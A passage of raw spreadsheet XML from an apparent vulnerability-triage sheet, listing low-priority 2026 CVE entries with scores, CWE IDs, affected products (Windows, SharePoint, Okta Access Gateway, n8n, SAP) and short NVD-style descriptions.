t="inlineStr"><is><t>okta</t></is></c><c r="K1482" s="5" t="inlineStr" /><c r="L1482" s="5" t="inlineStr" /><c r="M1482" s="5" t="inlineStr" /><c r="N1482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1482" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1482" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1482" s="5" t="inlineStr" /><c r="R1482" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1482" s="5" t="inlineStr"><is><t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t></is></c><c r="T1482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t></is></c></row><row r="1483"><c r="A1483" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1483" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1483" s="5" t="inlineStr"><is><t>CVE-2026-86085</t></is></c><c r="D1483" s="5" t="n"><v>4.9</v></c><c r="E1483" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1483" s="5" t="inlineStr" /><c r="H1483" s="5" t="n"><v>0.003</v></c><c r="I1483" s="5" t="inlineStr" /><c r="J1483" s="5" t="inlineStr" /><c r="K1483" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1483" s="5" t="inlineStr" /><c r="M1483" s="5" t="inlineStr" /><c r="N1483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1483" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1483" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1483" s="5" t="inlineStr" /><c r="R1483" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1483" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the /rest/roles/:slug/assignments and /rest/roles/:slug/assignments/:projectId/members endpoints checked only whether the caller could manage the role type. A caller with role:manageProject could name a project the caller could not list and obtain member names and email addresses. The affected controller is packages/cli/src/controllers/role.controller.ts, which omitted the project:list scope check. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="T1483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86085</t></is></c></row><row r="1484"><c r="A1484" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1484" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1484" s="5" t="inlineStr"><is><t>CVE-2026-86993</t></is></c><c r="D1484" s="5" t="n"><v>4.9</v></c><c r="E1484" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1484" s="5" t="inlineStr" /><c r="H1484" s="5" t="n"><v>0.003</v></c><c r="I1484" s="5" t="inlineStr" /><c r="J1484" s="5" t="inlineStr" /><c r="K1484" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1484" s="5" t="inlineStr" /><c r="M1484" s="5" t="inlineStr" /><c r="N1484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1484" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1484" s="5" t="inlineStr" /><c r="R1484" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1484" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, a Log Streaming event destination could reference a generic HTTP credential and decrypt whichever credential ID it named without an ownership check. A user with a custom global role carrying Log Streaming scopes could select a credential belonging to another project and send its decrypted secret to an attacker-controlled endpoint. The affected authorization boundary is packages/cli/src/modules/log-streaming.ee/destinations/destination-credentials-access.ts and the credential:read scope. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86993</t></is></c></row><row r="1485"><c r="A1485" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1485" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1485" s="5" t="inlineStr"><is><t>CVE-2026-69474</t></is></c><c r="D1485" s="5" t="n"><v>4.8</v></c><c r="E1485" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1485" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1485" s="5" t="inlineStr" /><c r="H1485" s="5" t="n"><v>0.007</v></c><c r="I1485" s="5" t="inlineStr" /><c r="J1485" s="5" t="inlineStr" /><c r="K1485" s="5" t="inlineStr" /><c r="L1485" s="5" t="inlineStr" /><c r="M1485" s="5" t="inlineStr" /><c r="N1485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1485" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1485" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1485" s="5" t="inlineStr" /><c r="R1485" s="5" t="inlineStr"><is><t>CWE-126, CWE-416</t></is></c><c r="S1485" s="5" t="inlineStr"><is><t>Use after free in Windows Overlay Filter allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69474</t></is></c></row><row r="1486"><c r="A1486" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1486" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1486" s="5" t="inlineStr"><is><t>CVE-2026-69615</t></is></c><c r="D1486" s="5" t="n"><v>4.8</v></c><c r="E1486" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1486" s="5" t="inlineStr" /><c r="H1486" s="5" t="n"><v>0.004</v></c><c r="I1486" s="5" t="inlineStr" /><c r="J1486" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1486" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1486" s="5" t="inlineStr" /><c r="M1486" s="5" t="inlineStr" /><c r="N1486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1486" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1486" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1486" s="5" t="inlineStr" /><c r="R1486" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1486" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t></is></c></row><row r="1487"><c r="A1487" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1487" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1487" s="5" t="inlineStr"><is><t>CVE-2026-78560</t></is></c><c r="D1487" s="5" t="n"><v>4.8</v></c><c r="E1487" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1487" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1487" s="5" t="inlineStr" /><c r="H1487" s="5" t="n"><v>0.002</v></c><c r="I1487" s="5" t="inlineStr" /><c r="J1487" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1487" s="5" t="inlineStr" /><c r="L1487" s="5" t="inlineStr" /><c r="M1487" s="5" t="inlineStr" /><c r="N1487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1487" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1487" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1487" s="5" t="inlineStr" /><c r="R1487" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1487" s="5" t="inlineStr"><is><t>The Okta Access Gateway includes an optional pass-through authentication source that accepts user identity from a client-supplied HTTP header without cryptographic validation. In architectures where this optional source is enabled without an upstream reverse proxy or firewall configured to sanitize and enforce client headers, an unauthenticated user can supply an arbitrary identity value to initiate a session.</t></is></c><c r="T1487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t></is></c></row><row r="1488"><c r="A1488" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1488" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1488" s="5" t="inlineStr"><is><t>CVE-2026-68849</t></is></c><c r="D1488" s="5" t="n"><v>4.7</v></c><c r="E1488" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1488" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1488" s="5" t="inlineStr" /><c r="H1488" s="5" t="n"><v>0.002</v></c><c r="I1488" s="5" t="inlineStr" /><c r="J1488" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1488" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1488" s="5" t="inlineStr" /><c r="M1488" s="5" t="inlineStr" /><c r="N1488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1488" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1488" s="5" t="inlineStr" /><c r="R1488" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1488" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t></is></c></row><row r="1489"><c r="A1489" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1489" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1489" s="5" t="inlineStr"><is><t>CVE-2026-68891</t></is></c><c r="D1489" s="5" t="n"><v>4.7</v></c><c r="E1489" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1489" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1489" s="5" t="inlineStr" /><c r="H1489" s="5" t="n"><v>0.002</v></c><c r="I1489" s="5" t="inlineStr" /><c r="J1489" s="5" t="inlineStr" /><c r="K1489" s="5" t="inlineStr" /><c r="L1489" s="5" t="inlineStr" /><c r="M1489" s="5" t="inlineStr" /><c r="N1489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1489" s="5" t="inlineStr" /><c r="R1489" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1489" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68891</t></is></c></row><row r="1490"><c r="A1490" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1490" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1490" s="5" t="inlineStr"><is><t>CVE-2026-69316</t></is></c><c r="D1490" s="5" t="n"><v>4.7</v></c><c r="E1490" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1490" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1490" s="5" t="inlineStr" /><c r="H1490" s="5" t="n"><v>0.003</v></c><c r="I1490" s="5" t="inlineStr" /><c r="J1490" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K149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490" s="5" t="inlineStr" /><c r="M1490" s="5" t="inlineStr" /><c r="N1490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1490" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1490" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1490" s="5" t="inlineStr" /><c r="R1490" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1490" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="T1490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69316</t></is></c></row><row r="1491"><c r="A1491" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1491" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1491" s="5" t="inlineStr"><is><t>CVE-2026-69425</t></is></c><c r="D1491" s="5" t="n"><v>4.7</v></c><c r="E1491" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1491" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1491" s="5" t="inlineStr" /><c r="H1491" s="5" t="n"><v>0.003</v></c><c r="I1491" s="5" t="inlineStr" /><c r="J1491" s="5" t="inlineStr" /><c r="K1491" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1491" s="5" t="inlineStr" /><c r="M1491" s="5" t="inlineStr" /><c r="N1491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1491" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1491" s="5" t="inlineStr" /><c r="R1491" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1491" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69425</t></is></c></row><row r="1492"><c r="A1492" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1492" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1492" s="5" t="inlineStr"><is><t>CVE-2026-69483</t></is></c><c r="D1492" s="5" t="n"><v>4.7</v></c><c r="E1492" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1492" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1492" s="5" t="inlineStr" /><c r="H1492" s="5" t="n"><v>0.003</v></c><c r="I1492" s="5" t="inlineStr" /><c r="J1492" s="5" t="inlineStr" /><c r="K1492" s="5" t="inlineStr" /><c r="L1492" s="5" t="inlineStr" /><c r="M1492" s="5" t="inlineStr" /><c r="N1492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1492" s="5" t="inlineStr" /><c r="R1492" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1492" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Image Acquisition allows an authorized attacker to disclose information locally.</t></is></c><c r="T1492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69483</t></is></c></row><row r="1493"><c r="A1493" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1493" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1493" s="5" t="inlineStr"><is><t>CVE-2026-69771</t></is></c><c r="D1493" s="5" t="n"><v>4.7</v></c><c r="E1493" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1493" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1493" s="5" t="inlineStr" /><c r="H1493" s="5" t="n"><v>0.003</v></c><c r="I1493" s="5" t="inlineStr" /><c r="J1493" s="5" t="inlineStr" /><c r="K1493" s="5" t="inlineStr" /><c r="L1493" s="5" t="inlineStr" /><c r="M1493" s="5" t="inlineStr" /><c r="N1493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1493" s="5" t="inlineStr" /><c r="R1493" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1493" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Container Manager Service allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69771</t></is></c></row><row r="1494"><c r="A1494" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1494" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1494" s="5" t="inlineStr"><is><t>CVE-2026-69792</t></is></c><c r="D1494" s="5" t="n"><v>4.7</v></c><c r="E1494" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1494" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1494" s="5" t="inlineStr" /><c r="H1494" s="5" t="n"><v>0.002</v></c><c r="I1494" s="5" t="inlineStr" /><c r="J1494" s="5" t="inlineStr" /><c r="K1494" s="5" t="inlineStr" /><c r="L1494" s="5" t="inlineStr" /><c r="M1494" s="5" t="inlineStr" /><c r="N1494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1494" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1494" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1494" s="5" t="inlineStr" /><c r="R1494" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1494" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Win32K allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69792</t></is></c></row><row r="1495"><c r="A1495" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1495" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1495" s="5" t="inlineStr"><is><t>CVE-2026-69832</t></is></c><c r="D1495" s="5" t="n"><v>4.7</v></c><c r="E1495" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1495" s="5" t="inlineStr" /><c r="H1495" s="5" t="n"><v>0.004</v></c><c r="I1495" s="5" t="inlineStr" /><c r="J1495" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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95" s="5" t="inlineStr" /><c r="M1495" s="5" t="inlineStr" /><c r="N1495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1495" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1495" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1495" s="5" t="inlineStr" /><c r="R1495" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1495" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t></is></c></row><row r="1496"><c r="A1496" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1496" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1496" s="5" t="inlineStr"><is><t>CVE-2026-69853</t></is></c><c r="D1496" s="5" t="n"><v>4.7</v></c><c r="E1496" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1496" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1496" s="5" t="inlineStr" /><c r="H1496" s="5" t="n"><v>0.003</v></c><c r="I1496" s="5" t="inlineStr" /><c r="J1496" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K149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96" s="5" t="inlineStr" /><c r="M1496" s="5" t="inlineStr" /><c r="N1496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1496" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1496" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1496" s="5" t="inlineStr" /><c r="R1496" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1496" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t></is></c></row><row r="1497"><c r="A1497" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1497" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1497" s="5" t="inlineStr"><is><t>CVE-2026-69895</t></is></c><c r="D1497" s="5" t="n"><v>4.7</v></c><c r="E1497" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1497" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1497" s="5" t="inlineStr" /><c r="H1497" s="5" t="n"><v>0.003</v></c><c r="I1497" s="5" t="inlineStr" /><c r="J1497" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K149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97" s="5" t="inlineStr" /><c r="M1497" s="5" t="inlineStr" /><c r="N1497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1497" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1497" s="5" t="inlineStr" /><c r="R1497" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1497" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t></is></c></row><row r="1498"><c r="A1498" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1498" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1498" s="5" t="inlineStr"><is><t>CVE-2026-72931</t></is></c><c r="D1498" s="5" t="n"><v>4.7</v></c><c r="E1498" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1498" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1498" s="5" t="inlineStr" /><c r="H1498" s="5" t="n"><v>0.003</v></c><c r="I1498" s="5" t="inlineStr" /><c r="J1498" s="5" t="inlineStr" /><c r="K1498" s="5" t="inlineStr" /><c r="L1498" s="5" t="inlineStr" /><c r="M1498" s="5" t="inlineStr" /><c r="N1498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1498" s="5" t="inlineStr" /><c r="R1498" s="5" t="inlineStr"><is><t>CWE-772</t></is></c><c r="S1498" s="5" t="inlineStr"><is><t>Missing release of resource after effective lifetime in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to deny service locally.</t></is></c><c r="T1498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72931</t></is></c></row><row r="1499"><c r="A1499" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1499" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1499" s="5" t="inlineStr"><is><t>CVE-2026-69381</t></is></c><c r="D1499" s="5" t="n"><v>4.6</v></c><c r="E1499" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1499" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1499" s="5" t="inlineStr" /><c r="H1499" s="5" t="n"><v>0.004</v></c><c r="I1499" s="5" t="inlineStr" /><c r="J1499" s="5" t="inlineStr" /><c r="K1499" s="5" t="inlineStr" /><c r="L1499" s="5" t="inlineStr" /><c r="M1499" s="5" t="inlineStr" /><c r="N1499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1499" s="5" t="inlineStr" /><c r="R1499" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1499" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Port Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69381</t></is></c></row><row r="1500"><c r="A1500" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1500" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1500" s="5" t="inlineStr"><is><t>CVE-2026-69548</t></is></c><c r="D1500" s="5" t="n"><v>4.6</v></c><c r="E1500" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1500" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1500" s="5" t="inlineStr" /><c r="H1500" s="5" t="n"><v>0.005</v></c><c r="I1500" s="5" t="inlineStr" /><c r="J1500" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K15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00" s="5" t="inlineStr" /><c r="M1500" s="5" t="inlineStr" /><c r="N1500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1500" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1500" s="5" t="inlineStr" /><c r="R1500" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1500" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1500" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t></is></c></row><row r="1501"><c r="A1501" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1501" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1501" s="5" t="inlineStr"><is><t>CVE-2026-76959</t></is></c><c r="D1501" s="5" t="n"><v>4.6</v></c><c r="E1501" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1501" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1501" s="5" t="inlineStr" /><c r="H1501" s="5" t="n"><v>0.001</v></c><c r="I1501" s="5" t="inlineStr" /><c r="J1501" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1501" s="5" t="inlineStr" /><c r="L1501" s="5" t="inlineStr" /><c r="M1501" s="5" t="inlineStr" /><c r="N1501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1501" s="5" t="inlineStr" /><c r="R1501" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1501" s="5" t="inlineStr"><is><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is></c><c r="T1501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t></is></c></row><row r="1502"><c r="A1502" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1502" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1502" s="5" t="inlineStr"><is><t>CVE-2026-78452</t></is></c><c r="D1502" s="5" t="n"><v>4.6</v></c><c r="E1502" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1502" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1502" s="5" t="inlineStr" /><c r="H1502" s="5" t="n"><v>0.005</v></c><c r="I1502" s="5" t="inlineStr" /><c r="J1502" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1502"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502" s="5" t="inlineStr" /><c r="M1502" s="5" t="inlineStr" /><c r="N1502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1502" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1502" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1502" s="5" t="inlineStr" /><c r="R1502" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1502" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t></is></c></row><row r="1503"><c r="A1503" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1503" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1503" s="5" t="inlineStr"><is><t>CVE-2026-78508</t></is></c><c r="D1503" s="5" t="n"><v>4.6</v></c><c r="E1503" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1503" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1503" s="5" t="inlineStr" /><c r="H1503" s="5" t="n"><v>0.004</v></c><c r="I1503" s="5" t="inlineStr" /><c r="J1503" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K15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03" s="5" t="inlineStr" /><c r="M1503" s="5" t="inlineStr" /><c r="N1503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1503" s="5" 